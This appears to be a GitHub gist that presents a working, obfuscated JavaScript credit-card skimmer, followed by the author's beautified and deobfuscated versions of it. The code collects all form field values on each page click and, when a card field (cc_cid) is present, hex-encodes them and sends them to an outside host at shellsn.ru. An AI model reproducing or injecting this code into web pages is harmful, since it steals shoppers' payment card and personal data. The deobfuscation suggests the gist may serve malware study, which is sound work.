Skip to content

Instantly share code, notes, and snippets.

@krautface

krautface/simple-skimmer.js Secret

Created August 27, 2019 04:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save krautface/aed463ec9c5a3aa444a10dffeba295c3 to your computer and use it in GitHub Desktop.
Save krautface/aed463ec9c5a3aa444a10dffeba295c3 to your computer and use it in GitHub Desktop.
Download ZIP
A simple skimmer with hex encoded values
Raw
simple-skimmer.js
var _0xf97f=["\x63\x6C\x69\x63\x6B","","\x6C\x65\x6E\x67\x74\x68","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x3D","\x26","\x65\x78\x65\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x68\x65\x6C\x6C\x73\x6E\x2E\x72\x75\x2F\x64\x2E\x70\x68\x70\x3F\x64\x3D","\x6F\x62\x73\x65\x72\x76\x65"];Event[_0xf97f[12]](document,_0xf97f[0],function(){function _0xd841x1(_0xd841x2){var _0xd841x3=_0xf97f[1];for(var _0xd841x4=0;_0xd841x4< _0xd841x2[_0xf97f[2]];_0xd841x4++){_0xd841x3+= _0xf97f[1]+ _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16)};return _0xd841x3}var _0xd841x5=_0xf97f[1];var _0xd841x2=/cc_cid/;for(var _0xd841x6=document[_0xf97f[5]](_0xf97f[4]),_0xd841x4=0;_0xd841x4< _0xd841x6[_0xf97f[2]];_0xd841x4++){if(_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]]> 0){var _0xd841x7=_0xd841x6[_0xd841x4][_0xf97f[7]];_0xf97f[1]== _0xd841x7&& (_0xd841x7= _0xd841x4),_0xd841x5+= _0xd841x7+ _0xf97f[8]+ _0xd841x6[_0xd841x4][_0xf97f[6]]+ _0xf97f[9]}};if(_0xd841x2[_0xf97f[10]](_0xd841x5)){ new Ajax.Request(_0xf97f[11]+ _0xd841x1(_0xd841x5))}});
@krautface
Copy link
Author

The above, but beautified

var _0xf97f = [
  "\x63\x6C\x69\x63\x6B",
  "",
  "\x6C\x65\x6E\x67\x74\x68",
  "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74",
  "\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78",
  "\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C",
  "\x76\x61\x6C\x75\x65",
  "\x6E\x61\x6D\x65",
  "\x3D",
  "\x26",
  "\x65\x78\x65\x63",
  "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x68\x65\x6C\x6C\x73\x6E\x2E\x72\x75\x2F\x64\x2E\x70\x68\x70\x3F\x64\x3D",
  "\x6F\x62\x73\x65\x72\x76\x65"
];
Event[_0xf97f[12]](document, _0xf97f[0], function() {
  function _0xd841x1(_0xd841x2) {
    var _0xd841x3 = _0xf97f[1];
    for (var _0xd841x4 = 0; _0xd841x4 < _0xd841x2[_0xf97f[2]]; _0xd841x4++) {
      _0xd841x3 += _0xf97f[1] + _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16);
    }
    return _0xd841x3;
  }
  var _0xd841x5 = _0xf97f[1];
  var _0xd841x2 = /cc_cid/;
  for (
    var _0xd841x6 = document[_0xf97f[5]](_0xf97f[4]), _0xd841x4 = 0;
    _0xd841x4 < _0xd841x6[_0xf97f[2]];
    _0xd841x4++
  ) {
    if (_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]] > 0) {
      var _0xd841x7 = _0xd841x6[_0xd841x4][_0xf97f[7]];
      _0xf97f[1] == _0xd841x7 && (_0xd841x7 = _0xd841x4),
        (_0xd841x5 +=
          _0xd841x7 +
          _0xf97f[8] +
          _0xd841x6[_0xd841x4][_0xf97f[6]] +
          _0xf97f[9]);
    }
  }
  if (_0xd841x2[_0xf97f[10]](_0xd841x5)) {
    new Ajax.Request(_0xf97f[11] + _0xd841x1(_0xd841x5));
  }
});

@krautface
Copy link
Author

krautface commented Aug 27, 2019
edited

The above, but deobfuscated through beautifier.io

var _0xf97f = [
    "click",
    "",
    "length",
    "charCodeAt",
    "input, select, textarea, checkbox",
    "querySelectorAll",
    "value",
    "name",
    "=",
    "&",
    "exec",
    "https://shellsn.ru/d.php?d=",
    "observe"
];
Event[_0xf97f[12]](document, _0xf97f[0], function() {
    function _0xd841x1(_0xd841x2) {
        var _0xd841x3 = _0xf97f[1];
        for (var _0xd841x4 = 0; _0xd841x4 < _0xd841x2[_0xf97f[2]]; _0xd841x4++) {
            _0xd841x3 += _0xf97f[1] + _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16);
        }
        return _0xd841x3;
    }
    var _0xd841x5 = _0xf97f[1];
    var _0xd841x2 = /cc_cid/;
    for (
        var _0xd841x6 = document[_0xf97f[5]](_0xf97f[4]), _0xd841x4 = 0; _0xd841x4 < _0xd841x6[_0xf97f[2]]; _0xd841x4++
    ) {
        if (_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]] > 0) {
            var _0xd841x7 = _0xd841x6[_0xd841x4][_0xf97f[7]];
            _0xf97f[1] == _0xd841x7 && (_0xd841x7 = _0xd841x4),
                (_0xd841x5 +=
                    _0xd841x7 +
                    _0xf97f[8] +
                    _0xd841x6[_0xd841x4][_0xf97f[6]] +
                    _0xf97f[9]);
        }
    }
    if (_0xd841x2[_0xf97f[10]](_0xd841x5)) {
        new Ajax.Request(_0xf97f[11] + _0xd841x1(_0xd841x5));
    }
});

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment